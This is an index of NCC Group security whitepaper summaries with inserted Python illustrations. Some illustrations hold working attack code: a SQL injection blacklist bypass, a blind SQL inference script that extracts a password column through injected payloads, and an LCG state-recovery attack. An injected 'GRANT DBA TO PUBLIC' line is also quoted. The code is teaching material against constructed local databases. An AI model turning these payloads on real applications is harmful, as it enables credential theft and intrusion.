Whitepapers
Building WiMap the Wi-Fi Mapping Drone
We’ve published a whitepaper about how we built WiMap, which is a Wi-Fi mapping drone. The paper includes details of the methods used to create, from parts, a hexacopter capable of being controlled over 3/4G and equipped to perform wireless and infrastructure assessments. We’d love to hear your feedback via…
Exploiting CVE-2014-0282
This whitepaper details the vulnerability and examines some of the concepts needed for browser exploitation before describing how to construct a working exploit that exits gracefully. Authored by Katy Winterborn.
Whitepaper – Project Triforce: Run AFL On Everything (2017)
Six years ago, NCC Group researchers Tim Newsham and Jesse Hertz released TriforceAFL – an extension of the American Fuzzy Lop (AFL) fuzzer which supports full-system fuzzing using QEMU – but unfortunately the associated whitepaper for this work was never published. Today, we’re releasing it for the curious reader and…
SETTLERS OF NETLINK: Exploiting a limited UAF in nf_tables (CVE-2022-32250)
Outline: Introduction; netlink and nf_tables Overview; Sets; Expressions; Set Expressions; Stateful Expressions; Expressions of Interest (nft_lookup, nft_dynset, nft_connlimit); Vulnerability Discovery; CVE-2022-32250 Analysis; Set Creation; Set Deactivation; Initial Limited UAF Write; Exploitation; Building an Initial Plan; Offsets We Can Write at Into the UAF Chunk; Hunting for Replacement Objects; What Pointer Do…
Whitepaper – Practical Attacks on Machine Learning Systems
This paper collects a set of notes and research projects conducted by NCC Group on the topic of the security of Machine Learning (ML) systems. The objective is to provide some industry perspective to the academic community, while collating helpful references for security practitioners, to enable more effective security auditing…
Whitepaper – Double Fetch Vulnerabilities in C and C++
Double fetch vulnerabilities in C and C++ have been known about for a number of years. However, they can appear in multiple forms and can have varying outcomes. As much of this information is spread across various sources, this whitepaper draws the knowledge together into a single place, in order…
Research Paper – Machine Learning for Static Malware Analysis, with University College London
For the past few years, NCC Group has been an industry partner to the Centre for Doctoral Training in Data Intensive Science (CDT in DIS) at University College London (UCL). CDT is composed of a group of over 80 academics from across UCL in areas such as High Energy Physics,…
Whitepaper – Exploring the Security of KaiOS Mobile Applications
KaiOS is a mobile operating system, forked from the discontinued Firefox OS, in which all the mobile applications running on a KaiOS-based mobile device are built using web technologies, such as HTML, JavaScript, and CSS. In this independent research project, we demonstrate that six of the pre-installed mobile applications are…
Cyber Security of New Space Paper
NCC Group's Transport Security Practice has co-authored with the Surrey Center for Cyber Security and the Surrey Space Center a new paper titled 'Cyber security in New Space'. It provides analysis of the threats, challenges and key technologies related to the satellite industry.
Research Report – Zephyr and MCUboot Security Assessment
Authors: Jeremy Boone, Ilya Zhuravlev Over the years, NCC Group has audited countless embedded devices for our customers. Through these security assessments, we have observed that IoT devices are typically built using a hodgepodge of chipset vendor board support packages (BSP), bootloaders, SDKs, and an established Real Time Operating System…
Whitepaper – Coinbugs: Enumerating Common Blockchain Implementation-Level Vulnerabilities
By Aleksandar Kircanski and Terence Tarvis A good amount of effort has been dedicated to surveying and systematizing Ethereum smart contract security bug classes. There is, however, a gap in literature when it comes to surveying implementation-level security bugs that commonly occur in basic PoW blockchain node implementations, discovered during…
Whitepaper – Microcontroller Readback Protection: Bypasses and Defenses
By Sultan Qasim Khan Microcontrollers commonly include features to prevent the readout of sensitive information in internal storage. Such features are commonly referred to as readback protection or readout protection. This paper describes common readback protection implementation flaws, discusses techniques that can be used to defeat readback protection, and provides…
Whitepaper – A Tour of Curve 25519 in Erlang
By Eric Schorn An introduction to elliptic curve cryptography theory alongside a practical implementation in Erlang. This whitepaper may be downloaded below.
Security impact of IoT on the Enterprise
We are moving to a time where many ‘things’ that we know and use have the capability to be connected to a network, either wired or wireless. The way we use technology is becoming more integrated in all aspects of our daily lives and is steadily integrating within the enterprise…
Secure Device Provisioning Best Practices: Heavy Truck Edition
The complexities of the heavy truck ecosystem pose challenges to the security of the ECU networks contained within the vehicles. This paper describes some of the major sources of complexity, and how each can be addressed to design and implement a secure, robust ECU provisioning system. Such a system is…
An Introduction to Ultrasound Security Research
Over the past few years there has been an increase in the use of sound as a communications channel for device-to-device communications. This practice has been termed Data-Over-Sound (DOS) and has been billed as a cheap and easy to use alternative to traditional communications protocols such as Wi-Fi and Bluetooth.…
An Introduction to Quantum Computing for Security Professionals
Quantum computing is still in its infancy but is expected to cause major changes to the technology landscape in coming years. Its ability to massively reduce the time taken for processes normally requiring large amounts of processing power is already causing concerns about the future of cryptography and the resistance…
Cyber Security in UK Agriculture
This whitepaper addresses the cyber security threat to agriculture and the wider food network. The perspective and primary focus is the United Kingdom but the majority of observations on the structure of markets, technologies and related issues are largely applicable to other countries. Furthermore, some of the recommended actions identified in…
NCC Group Connected Health Whitepaper July 2019
Connected Health is a rapidly growing area with huge innovative possibilities and potential. This is mostly due to the uptake of digital technologies in the health and medical fields that support diagnosis, treatment and management of health conditions. It is however crucially important that security of Connected Health products, systems…
Whitepaper – Hardware-Backed Heist: Extracting ECDSA Keys from Qualcomm’s TrustZone
Editor’s note: This work was also presented at ACM CCS 2019. Written by Keegan Ryan. Trusted Execution Environments (TEEs) such as ARM TrustZone are in widespread use in both mobile and embedded devices, and they are used to protect sensitive secrets while often sharing the same computational hardware as untrusted code. Although there…
Assessing Unikernel Security
Abstract Unikernels are small, specialized, single-address-space machine images constructed by treating component applications and drivers like libraries and compiling them, along with a kernel and a thin OS layer, into a single binary blob. Proponents of unikernels claim that their smaller codebase and lack of excess services make them more efficient and secure than…
Use of Deserialisation in .NET Framework Methods and Classes
These days it is quite common to see a deserialisation flaw in a product. Although awareness around finding and exploiting this type of vulnerability is out there for security researchers, developers can still struggle with securing their code especially when they are not fully aware of dangerous methods and functionalities…
Nine years of bugs at NCC Group
As part of our vulnerability research work at NCC Group we find many vulnerabilities (bugs) in commercial products and systems and for the past nine years we have kept a detailed internal log of these bugs. In this whitepaper prepared by Matt Lewis, Research Director at NCC Group, we…
The 9 Lives of Bleichenbacher’s CAT: New Cache ATtacks on TLS Implementations
In this whitepaper*, nine different implementations of TLS were tested against cache attacks and seven were found to be vulnerable: OpenSSL, Amazon s2n, MbedTLS, Apple CoreTLS, Mozilla NSS, WolfSSL, and GnuTLS. The cat remains alive, with two lives left thanks to BearSSL (developed by NCC Group’s Thomas Pornin) and Google’s BoringSSL. The issues were disclosed back in August, and the teams…
Public cloud
Whenever an outage occurs at one of the major public cloud providers, or a data breach of information held by them, the immediate press coverage starts asking whether they really are as secure and reliable as traditionally managed servers. This whitepaper provides an overview of public cloud services and the steps to…
Improving Your Embedded Linux Security Posture With Yocto
Embedded systems are regularly found to lack modern security-focused designs and implementations, despite decades of advancements in the field of computer security. Although the emergence and adoption of projects such as Yocto and OpenEmbedded have made it easier to develop and maintain firmware for embedded Linux systems, NCC Group has…
The disadvantages of a blacklist-based approach to input validation
It’s not uncommon to find websites that attempt to validate user input and block code injection attacks using a blacklist of dangerous characters or keywords. Superficially, this might seem like a common-sense way to protect a website with minimum effort but it can prove to be extremely difficult to comprehensively…
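As an added illustration (example code, not from the whitepaper): a hypothetical keyword and character blacklist applied to a numeric lookup parameter, defeated by a payload that contains none of the listed tokens, beside the parameterised query that makes the blacklist unnecessary. The table, its rows and the blacklist pattern are all constructed for the example.

```python
import re
import sqlite3

# Hypothetical "dangerous characters and keywords" blacklist of the kind the
# whitepaper describes; constructed for this example.
BLACKLIST = re.compile(
    r"""['";]|--|/\*|\b(union|select|insert|update|delete|drop|or|and)\b""",
    re.IGNORECASE,
)


def blacklist_allows(value: str) -> bool:
    """True if the input contains none of the blacklisted tokens."""
    return BLACKLIST.search(value) is None


def make_db() -> sqlite3.Connection:
    """In-memory table with constructed rows; the attacker wants every name."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE users(id INTEGER, name TEXT, role TEXT);"
        "INSERT INTO users VALUES (1,'alice','admin'),(2,'bob','user'),(3,'carol','user');"
    )
    return conn


def lookup_with_blacklist(conn: sqlite3.Connection, user_id: str) -> list:
    """Vulnerable: the blacklist is the only control, then the value is concatenated."""
    if not blacklist_allows(user_id):
        raise ValueError("rejected by blacklist")
    return [r[0] for r in conn.execute(f"SELECT name FROM users WHERE id = {user_id}")]


def lookup_parameterised(conn: sqlite3.Connection, user_id) -> list:
    """Fixed: the value is bound as data and can never change the query's structure."""
    return [r[0] for r in conn.execute("SELECT name FROM users WHERE id = ?", (user_id,))]


# The obvious tautology is caught, but the blacklist cannot enumerate every way
# of writing a condition that holds for every row.
OBVIOUS = "1 OR 1=1"   # blocked: contains OR
BYPASS = "id"          # WHERE id = id is true for every row and uses no listed token

if __name__ == "__main__":
    db = make_db()
    print(lookup_with_blacklist(db, BYPASS))   # all three names leak
    print(lookup_parameterised(db, BYPASS))    # []: "id" is just a value here
```

The bypass works because the filter reasons about tokens while the database reasons about grammar; the fix moves the attacker-controlled value out of the grammar altogether.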
Ethics in Security Testing
This paper discusses the similarities and differences between professional ethics in the information security industry and ethics in the hacker community. Sources of conflict and shared values of the two are discussed in order to find some reconciliation and come to an understanding of how a shared set of ethics…
Return of the hidden number problem
Abstract Side channels have long been recognised as a threat to the security of cryptographic applications. Implementations can unintentionally leak secret information through many channels, such as microarchitectural state changes in processors, changes in power consumption, or electromagnetic radiation. As a result of these threats, many implementations have been hardened to defend against these…
Open Banking: Security considerations & potential risks
The concept of Open Banking is an innovative one. However, as with any new developments surrounding sensitive financial information it is imperative to assess the security implications of these actions. Matthew Pettitt discusses the pros and cons of the planned implementation and potential risks of Open Banking in NCC Group’s…
The economics of defensive security
While there are many claims that cyber security is an indispensable necessary cost, there is also a body of opinion that cyber security does not always justify its costs and the financial impacts of a breach are frequently either exaggerated or unclear. As a response to these concerns, this whitepaper…
Integrity destroying malicious code for financial or geopolitical gain: A vision of the future?
“We’re entering a new world in which data may be more important than software.” Tim O’Reilly Following from our recent CISO research council, our research team have put together this whitepaper, which explores the evolutionary steps in ransomware and malicious code and what NCC Group’s current perspective is. Ransomware as…
Mobile & web browser credential management: Security implications, attack cases & mitigations
With the exponential increase of online services over the last decade, it is no surprise that the theft of credentials from poorly-secured applications is a growing concern and data breaches are becoming more of a regular occurrence. Even if we manage to secure and lock down these applications, do we…
SOC maturity & capability
Security is a high priority for most organisations. A string of high-profile breaches in big multinational companies has brought home the threat that all organisations face in the modern world. Therefore, a growing number of companies are considering how to best protect themselves and reduce the impact of a…
Automated Reverse Engineering of Relationships Between Data Structures in C++ Binaries
Real-time, memory-level interoperability with a closed-source binary may be desired for a number of reasons. In order to read from and write to specific data structures within a target process’ memory, external software must have knowledge of how to access these structures at any given time. Since many objects are…
Pointer Sequence Reverser (PSR)
Nick Collisson, the author of Pointer Sequence Reverser (PSR), occasionally found himself with the need to write software that integrates deeply into an existing closed-source Windows binary and alters, or enhances, its behaviour. Such software must be able to access the data within the running process for reading and writing.…
Adversarial Machine Learning: Approaches & defences
Most of us interact with Artificial Intelligence (AI) or Machine Learning (ML) on a daily basis without even knowing; from Google translate, to facial recognition software on our mobile phones and digital assistance in financial services or call centres. It is a growing market with ever increasing possibilities across all…
eBook: Breach notification under GDPR – How to communicate a personal data breach
Working closely with our clients, both on site and at events, we are finding that several remain unclear on the topic of breach notification under GDPR. There seems to be little focused guidance on the topic despite the fact that the new regulation will be enforced from May 2018. This…
Managing PowerShell in a modern corporate environment
Following from our recent CISO research council, our research team have put together this whitepaper, which explores the use of PowerShell in a modern corporate environment and how to mitigate the associated threats. Since its introduction in 2006, PowerShell has grown to be a powerful and extensible management tool, allowing for…
Securing the continuous integration process
Continuous integration (CI) has long left the stage of experimental practices and moved into mainstream software development. It is used everywhere from start-ups to large organisations, in a variety of technology stacks and problem domains, from web applications to embedded software. However, the security implications of introducing CI are often…
Endpoint connectivity
The popularity of USB usage has grown and it has become a common vehicle for spreading malware. As such, the need to protect IT assets from a cyber attack is paramount and from a physical endpoint perspective, this presents a challenging dynamic when wanting to prevent a data breach via…
Database Security Brief: The Oracle Critical Patch Update for April 2007
On the 17th April 2007 Oracle released their 10th Critical Patch Update. This brief discusses the database flaws and EM01 which relates to the Intelligent Agent. Many of the flaws being patched are old issues. For example, DB01 relates to an issue first reported to Oracle in 2002 and another in June…
Buffer Underruns, DEP, ASLR and improving the Exploitation Prevention Mechanisms (XPMs) on the Windows platform
Buffer Underruns and Stack Protection Starting with Windows 2003 Server, Microsoft introduced a number of Exploitation Prevention Mechanisms (XPMs) into their software. Over time these XPMs were refined as weaknesses were discovered [1][2] and more XPMs were introduced. Today the XPMs have been added to Windows XP Service Pack 2…
Data-mining with SQL Injection and Inference
When drilling for data via SQL injection there are three classes of attack – inband, out-of-band and the relatively unknown inference attack. Inband attacks extract data over the same channel between the client and the web server, for example, results are embedded in a web page via a union select. Out-of-band attacks employ…
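The inference channel, as an added example that is not part of the whitepaper: a vulnerable lookup that reveals only whether a row matched, and an attacker that turns that single bit per request into the full contents of another column with a binary search on each character. The database, the secret value and the use of SQLite's `length`, `substr` and `unicode` functions in the payload are constructed for the example.

```python
import sqlite3

SECRET = "s3cr3t!Pa55"   # constructed value the attacker wants to read


class Oracle:
    """Stand-in for a page that answers only 'found' or 'not found'."""

    def __init__(self):
        self.conn = sqlite3.connect(":memory:")
        self.conn.execute("CREATE TABLE users(name TEXT, password TEXT)")
        self.conn.execute("INSERT INTO users VALUES ('admin', ?)", (SECRET,))
        self.requests = 0

    def found(self, username: str) -> bool:
        # Vulnerable string concatenation; the only observable is found / not found.
        self.requests += 1
        sql = f"SELECT 1 FROM users WHERE name = '{username}'"
        return self.conn.execute(sql).fetchone() is not None


def infer_column(oracle: Oracle, column: str = "password", max_len: int = 64) -> str:
    """Recover a column value one character at a time: one request to learn that the
    position exists, then seven yes/no requests to pin down an ASCII code point."""
    value = ""
    for i in range(1, max_len + 1):
        if not oracle.found(f"admin' AND length({column}) >= {i} -- "):
            break                                # no i-th character: done
        lo, hi = 0, 127                          # search space: ASCII code points
        while lo < hi:
            mid = (lo + hi) // 2
            # "is the code point of the i-th character greater than mid?" -> one bit
            if oracle.found(f"admin' AND unicode(substr({column},{i},1)) > {mid} -- "):
                lo = mid + 1
            else:
                hi = mid
        value += chr(lo)
    return value


if __name__ == "__main__":
    o = Oracle()
    print(infer_column(o), "recovered in", o.requests, "requests")
```

The trailing `-- ` comments out the closing quote the application appends. Compared with an inband union query that returns the column in one response, the cost here is eight requests per character, which is why inference attacks are slower but still entirely practical, and why rate-limiting alone is not a fix.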
The Pharming Guide – Understanding and preventing DNS related attacks by phishers
Exploiting well-known flaws in DNS services and the way in which host names are resolved to IP addresses, phishers have upped the ante in the cyber war for control of a customer’s online identity for financial gain. A group of attack vectors now referred to as “Pharming” affects the fundamental…
Weak Randomness Part I – Linear Congruential Random Number Generators
The objective of this series of papers is to describe the mathematical properties of some of the more common pseudo-random sequence generators and to show how they can be attacked by illustrating the principles with real-world bugs. The series demonstrates how weak randomness can be identified, used to compromise real-world systems, and defended against.…
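As an added example (not from the paper series): recovering the parameters of a full-output linear congruential generator from a handful of observed values and predicting its next output, which is what makes such generators unusable for session tokens or other secrets. The generator constants are the ANSI C `rand()` values and the seed is an assumed one. Generators that emit only the top bits of their state, as many libraries do, need lattice techniques that this block does not cover.

```python
from math import gcd

# Assumed target: an LCG x_{n+1} = (a*x_n + c) mod m that emits its full state.
# These are the ANSI C rand() constants; the attacker is not assumed to know them.
A, C, M = 1103515245, 12345, 2 ** 31


def lcg_outputs(seed: int, count: int, a: int = A, c: int = C, m: int = M) -> list:
    """Constructed observation: `count` consecutive outputs of the generator."""
    out, x = [], seed
    for _ in range(count):
        x = (a * x + c) % m
        out.append(x)
    return out


def recover_modulus(xs: list) -> int:
    """Unknown modulus: with t_n = x_{n+1} - x_n we have t_{n+1} = a*t_n (mod m), so
    t_{n+1}*t_{n-1} - t_n^2 is a multiple of m. The gcd of several such values is m,
    or occasionally a small multiple of m, which the prediction check in attack() catches."""
    t = [xs[i + 1] - xs[i] for i in range(len(xs) - 1)]
    g = 0
    for i in range(1, len(t) - 1):
        g = gcd(g, abs(t[i + 1] * t[i - 1] - t[i] * t[i]))
    return g


def recover_multiplier_increment(xs: list, m: int) -> tuple:
    """Known modulus: from three consecutive outputs, a = (x2-x1)/(x1-x0) and
    c = x1 - a*x0 (mod m). Needs a difference that is invertible mod m."""
    for i in range(len(xs) - 2):
        x0, x1, x2 = xs[i:i + 3]
        d = (x1 - x0) % m
        if gcd(d, m) != 1:
            continue
        a = (x2 - x1) * pow(d, -1, m) % m
        c = (x1 - a * x0) % m
        return a, c
    raise ValueError("no invertible difference among the observed outputs")


def attack(observed: list, m: int = None) -> dict:
    """Recover (m, a, c) from the observed outputs and check them against all of them."""
    if m is None:
        m = recover_modulus(observed)
    a, c = recover_multiplier_increment(observed, m)
    # Every later observation must be reproduced exactly, or the parameters are wrong
    # (e.g. the gcd gave a multiple of m, or the source is not a plain LCG at all).
    verified = all((a * x + c) % m == y for x, y in zip(observed, observed[1:]))
    return {"m": m, "a": a, "c": c, "verified": verified,
            "next": (a * observed[-1] + c) % m}


if __name__ == "__main__":
    xs = lcg_outputs(seed=20230507, count=12)   # assumed seed
    print(attack(xs[:8]), "true next:", xs[8])
```

Three outputs fix the multiplier and increment once the modulus is known, and a few more fix the modulus itself; there is no key to brute-force, which is the sense in which the generator is "weak" rather than merely small.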
Exploiting PL/SQL Injection Flaws with only CREATE SESSION Privileges
When exploiting PL/SQL injection flaws in SELECT/UPDATE/INSERT/DELETE statements it has long been known that if an attacker can create their own function, and inject this, then it is possible for them to execute arbitrary PL/SQL code – for example EXECUTE IMMEDIATE ‘GRANT DBA TO PUBLIC’. Of course, if the attacker can’t create their own…
Blind Exploitation of Stack Overflow Vulnerabilities
This paper presents a number of technical discussion points relating to the potential for exploiting stack overflow vulnerabilities without having direct access to the application which is to be exploited. The points raised in this paper discuss the key issues which would need to be overcome in order to do this, as well…
Slotting Security into Corporate Development
Technology trail-blazing organisations such as large financial institutions have been working to secure their custom applications for several years, but the second-tier “technology following” organisations have been too slow to follow. This is now rapidly changing due to recent bad press following many highly publicised security compromises. In many of…
Creating Arbitrary Shellcode In Unicode Expanded Strings
The paper is intended to be read by the portion of the security community responsible for creating protective mechanisms to guard against “shellcode” type security flaws; the intention is to remove the perception that Unicode buffer overflows are non-exploitable and thereby improve the general state of network security. It…
Violating Database-Enforced Security Mechanisms
This paper discusses the feasibility of violating the access control, authentication and audit mechanisms of a running process in the Windows server operating systems. Specifically, it discusses the feasibility of totally disabling application-enforced access control in a running service, taking SQL Server 2000 as a sizeable and meaningful…
Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server
This paper presents several methods of bypassing the protection mechanism built into Microsoft’s Windows 2003 Server that attempts to prevent the exploitation of stack based buffer overflows. Recommendations about how to thwart these attacks are made where appropriate. Microsoft is committed to security. I’ve been playing with Microsoft products, as…
Non-flood/non-volumetric Distributed Denial of Service (DDoS)
Over the last two decades, both Denial of Service (DoS) and Distributed Denial of Service (DDoS) attacks have been growing in frequency, complexity and volume. Traditionally, these attacks are associated with botnets and large amounts of traffic aimed at disrupting Internet-facing services. However, while the goal of these attacks remains…
E-mail Spoofing and CDONTS.NEWMAIL
Many IIS web servers running ASP applications will use the CDONTS.NEWMAIL object to provide the functionality for feedback or contact forms. This paper will examine how the CDONTS.NEWMAIL object can be used by attackers to send arbitrary e-mails via the vulnerable web server and what must be done to prevent an online ASP…
Dangling Cursor Snarfing: A New Class of Attack in Oracle
In Oracle, a failure to close cursors created and used by DBMS_SQL or a failure to clean up open cursors in the event of an exception can lead to a security hole. If the cursor in question has been created by higher privileged code and left hanging then it’s possible for a low…
Database Servers on Windows XP and the unintended consequences of simple file sharing
This paper presents some unexpected consequences of running database servers on Windows XP with Simple File Sharing enabled. In the real world, this kind of setup would typically be a developer’s system and as it turns out, in some cases depending on the database software, you might not just be sharing your files…
DNS Pinning and Web Proxies
DNS-based attacks can be used to perform a partial breach of browser same origin restrictions in some situations, enabling a malicious web site to perform two-way interaction with a different domain. The attacks that are normally conceived against browser-based DNS pinning are capable of being resolved through additional safeguards within…
Which database is more secure? Oracle vs. Microsoft
This paper will examine the differences between the security posture of Microsoft’s SQL Server and Oracle’s RDBMS based upon flaws reported by external security researchers and since fixed by the vendor in question. Only flaws affecting the database server software itself have been considered in compiling this data so issues that affect, for example,…
Variations in Exploit methods between Linux and Windows
This paper will examine the differences and commonality in the way a vulnerability common to both Windows and Linux is exploited on each system. The Vulnerability. The vulnerability that will be discussed in this paper is a classic stack based overflow in Oracle’s RDBMS 9.2.0.1. As well as offering the standard SQL service,…
Using graph databases to assess the security of thingernets based on the thingabilities and thingertivity of things
“Security within the Internet of Things (IoT) is currently below par.” The statement above derives from many observations across our work in IoT (and that of the wider security research community) in addition to a myriad of regular, publicly reported issues and security concerns with IoT devices and their infrastructures.…
Beyond data loss prevention
Data Loss Prevention (DLP) is a security control aimed at highlighting when sensitive data leaves the corporate network or is accessed without authorisation. A DLP solution can be a great asset to a business and support a range of security goals and compliance. It can be an invaluable safety net…
How to protect yourself & your organisation from phishing attacks
With one click, his entire business was in the hands of someone else. Sensitive company information, bank account details, social media profiles, various other usernames and passwords. All stolen by a cyber criminal in a convincing phishing attempt. The email he’d received looked legitimate. It was just a simple request…
Rise of the machines: Machine Learning & its cyber security applications
“By far the greatest danger of Artificial Intelligence is that people conclude too early that they understand it.” Eliezer Yudkowsky At NCC Group, we are researching Machine Learning (ML) and Artificial Intelligence (AI) from a number of different angles in order to fully understand the pros and cons of ML…
Combating Java Deserialisation Vulnerabilities with Look-Ahead Object Input Streams (LAOIS)
Abstract Java Serialisation is an important and useful feature of Core Java that allows developers to transform a graph of Java objects into a stream of bytes for storage or transmission and then back into a graph of Java objects. Unfortunately, the Java Serialisation architecture is highly insecure and has led…
Latest threats to the connected car & intelligent transport ecosystem
The modern vehicle has become increasingly computerised as the demand for cleaner emissions and better transport safety for drivers and pedestrians has grown. Numerous initiatives are currently underway to begin to address this threat and to bring the principles used within traditional enterprise environments (such as the Secure Development Lifecycle)…
Network Attached Security: Attacking a Synology NAS
Abstract Network-Attached Storage (NAS) devices are a popular way for people to store and share their photos, videos and documents. Securing these devices is essential as they can contain sensitive information and are often exposed to the Internet. Because Synology is one of the top manufacturers of NAS devices, we chose to…
Accessing Private Fields Outside of Classes in Java
NCC Group’s Robert Seacord explores the underbelly of the Java language in his whitepaper on “Accessing Private Fields Outside of Classes in Java.” According to Robert, “The use of nested classes in Java programs weakens the accessibility guarantees of the language and allows private fields to be accessed from outside…
Understanding the insider threat & how to mitigate it
It is a widely held belief that the vast majority of threats to businesses are from outside attackers, with the stereotypical view of hackers trying to make money through crime. The problem with this viewpoint is that it does not consider the threat from a malicious insider. There is a…
Matty McMattface: Security implications, mitigations & testing strategies for biometric facial recognition systems
Biometric facial recognition is becoming an increasingly popular mechanism for authenticating users in online and mobile environments. In addition, it is continually being adopted for physical access control, whether at border controls such as airports or within secure facilities to enforce strict access control (and/or time and attendance tracking) to…
Encryption at rest: Not the panacea to data protection
Following from our recent CISO research council, our research team have put together this whitepaper, which explores encryption at rest. Encryption at rest is not a panacea to data protection due to its complexity and the utility of data. Often, misconceptions can (and do) arise whereby it is believed that…
Applying normalised compression distance for architecture classification
When working with malware research and black box penetration testing, it is not always clear what data you are working on and in order to disassemble binaries properly, one needs to know the architecture that the binary has been…
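Normalised compression distance, as an added example that is not the whitepaper's code: NCD(x, y) = (C(xy) - min(C(x), C(y))) / max(C(x), C(y)) with zlib as the compressor C, used to assign an unknown blob to the nearest of a set of reference corpora. Real architecture corpora are not reproduced here; the two "architectures" below are synthetic instruction streams drawn from distinct random vocabularies so that the block runs offline.

```python
import random
import zlib


def compressed_size(data: bytes) -> int:
    """C(x): the compressor's output length stands in for Kolmogorov complexity."""
    return len(zlib.compress(data, 9))


def ncd(x: bytes, y: bytes) -> float:
    """Normalised compression distance: near 0 for similar inputs, near 1 for unrelated ones."""
    cx, cy, cxy = compressed_size(x), compressed_size(y), compressed_size(x + y)
    return (cxy - min(cx, cy)) / max(cx, cy)


def classify(sample: bytes, references: dict) -> tuple:
    """Nearest reference corpus by NCD; returns (label, distance per label)."""
    distances = {label: ncd(sample, corpus) for label, corpus in references.items()}
    return min(distances, key=distances.get), distances


def synthetic_code(vocab_seed: int, word_len: int, words: int, stream_seed: int) -> bytes:
    """Constructed stand-in for machine code: a fixed random vocabulary of 256
    `word_len`-byte 'instructions' per architecture, emitted in random order."""
    vocab_rng = random.Random(vocab_seed)
    vocab = [bytes(vocab_rng.randrange(256) for _ in range(word_len)) for _ in range(256)]
    stream_rng = random.Random(stream_seed)
    return b"".join(stream_rng.choice(vocab) for _ in range(words))


def build_demo() -> tuple:
    """Reference corpora for two synthetic architectures plus an unlabelled sample of each."""
    references = {
        "archA": synthetic_code(vocab_seed=1, word_len=4, words=3000, stream_seed=100),
        "archB": synthetic_code(vocab_seed=2, word_len=3, words=3000, stream_seed=200),
    }
    samples = {
        "archA": synthetic_code(vocab_seed=1, word_len=4, words=600, stream_seed=300),
        "archB": synthetic_code(vocab_seed=2, word_len=3, words=600, stream_seed=400),
    }
    return references, samples


if __name__ == "__main__":
    refs, samples = build_demo()
    for truth, blob in samples.items():
        label, dist = classify(blob, refs)
        print(truth, "->", label, {k: round(v, 3) for k, v in dist.items()})
```

Two practical caveats: zlib only sees a 32 KiB window, so long inputs should be cut into chunks (or a different compressor used) before the distance means anything, and NCD(x, x) is small but not zero, so thresholds need calibrating on known samples rather than assumed.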
General Data Protection Regulation: Knowing your data
“GDPR is about giving people back control of their personal data.” The EU General Data Protection Regulation (GDPR) will come into force across all member states, including the UK, on 25 May 2018. It will provide a common baseline for data protection across all of the member states and its consistent approach and requirements will benefit…
Mergers & Acquisitions (M&A) cyber security due diligence
Regardless of the size, scope, geography or sector of your organisation, there are common elements that should be considered when it comes to cyber security due diligence during the M&A process. This whitepaper aims to cover the risks, opportunities and responsibilities associated with cyber security…
Best practices with BYOD
In today’s modern society the requirement for employees to be based within a corporate office is minimal, largely due to remote working gaining prominence. The cost to provide remote working or mobile technology to employees can, however, be expensive. An ideal solution to this cost issue is enabling the employee…
Understanding cyber risk management vs uncertainty with confidence in 2017
Every organisation faces uncertainty and this is often a key challenge in achieving its objectives. Much of this uncertainty comes from an inability to accurately predict future events. Generally, we can define a potential future event that could affect an organisation’s objectives as a ‘risk’ and the process of forecasting…
State-of-the-art email risk
Email was not designed to be used the way it is today. Organisations rely on email for daily business communication and while most are protecting against low-level threats, more sophisticated email-based attacks are on the rise. This NCC Group whitepaper highlights the overall risks that organisations face when using email…
Ransomware: what organisations can do to survive
We’ve published a short eBook based on our experience of dealing with numerous ransomware cases in the last few years. The eBook is designed to provide real-world advice as to what organisations should do to minimise the likelihood of initial infection as well as limit any impact should that fail.…
Research Insights Volume 8 – Hardware Design: FPGA Security Risks
FPGA stands for field-programmable gate array. An FPGA is a logic device whose function can be changed while the device is in place within its working environment, allowing the hardware processing of a system to be altered by an external configuration loading process. Their very nature creates potential security risks, and…
Optimum Routers: Researching Managed Routers
Abstract ISPs have moved to managed routers due to increased customer service calls with the question “What is my Wi-Fi password?” Managed routers allow complete remote management of a user’s home network and have facilitated customer service centers across ISPs. In this paper, we discuss the process of finding vulnerabilities in remotely managed routers,…
Peeling back the layers on defence in depth…knowing your onions
Is your organisation fully prepared for malicious attacks from both motivated external attackers and internal threat actors? As the threat landscape continues to evolve it is vital that organisations understand where the threats are and how…
End-of-life pragmatism
Does your organisation have a robust IT Refresh Policy in place? One of the main concerns relating to the replacement of IT infrastructure is the cost. The risk of introducing compatibility issues and, ultimately, downtime also causes anxiety. However, exploitation of vulnerabilities in…
Elephant in the Boardroom Survey 2016
UK plc wants tougher cyber regulation and more punishment for failings 71% of UK board directors want companies to be penalised for failing to meet basic cyber security requirements, according to new research from global cyber security and risk mitigation expert NCC Group. In what appears to be a sea…
Research Insights Volume 9 – Modern Security Vulnerability Discovery
NCC Group’s latest Research Insights paper provides a view on modern vulnerability discovery approaches. The identification of vulnerabilities and understanding what is involved in their exploitation has numerous applications in both the attack and defence side of cyber security. The way in which software vulnerabilities are discovered has evolved considerably over…
Post-quantum cryptography overview
Organisations that need to keep long-term secrets, or which are designing systems that will be in use for ten or more years, need to plan for a post-quantum-computing world. This whitepaper gives a short introduction and overview of post-quantum cryptography. We discuss why post-quantum crypto is needed and provide handles…
How will GDPR impact your communications?
We’ve published a short eBook about the potential impact General Data Protection Regulation (GDPR) may have on your marketing activity. Regardless of when or how the various negotiations develop with the EU, the UK’s data protection standards will have to be equivalent to the EU’s GDPR. The eBook is designed…
My name is Matt – My voice is my password
Voice biometrics are becoming an attractive mechanism for authenticating users in online and mobile environments. They may, however, not always be the best choice of authentication mechanism, depending on the performance and assurance requirements of the underlying application. A feasibility study should always be performed on the use of biometrics…
My Hash is My Passport: Understanding Web and Mobile Authentication
Andrew Tanenbaum once said, “The great thing about standards is there are so many to choose from.” That’s especially true in the realm of web and mobile application authentication. From Base-64 to OAuth, there are nearly as many ways to send your password to a server as there are ways…
How to Backdoor Diffie-Hellman
Lately, several backdoors in cryptographic constructions, protocols and implementations have been surfacing in the wild: Dual EC in RSA’s B-Safe product, a modified Dual EC in Juniper Networks’ operating system ScreenOS and a non-prime modulus in the open-source tool socat. Many papers have already discussed the fragility of cryptographic constructions…
Local network compromise despite good patching
A common misconception by Windows system administrators is that keeping operating systems fully updated is sufficient to keep them secure. However, even on a network which is fully patched and using the latest Windows operating systems, it is often trivial for an internal attacker to obtain user credentials, and in…
An Adaptive-Ciphertext Attack Against “I ⊕ C” Block Cipher Modes With an Oracle
Authored by: Tom Ritter Download Whitepaper
Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
Authored by: Brad Hill Download whitepaper
Blind Security Testing – An Evolutionary Approach
Authored by: Scott Stender Download whitepaper
Building Security In: Software Penetration Testing
Authored by: Scott Stender Download whitepaper
Command Injection in XML Signatures and Encryption
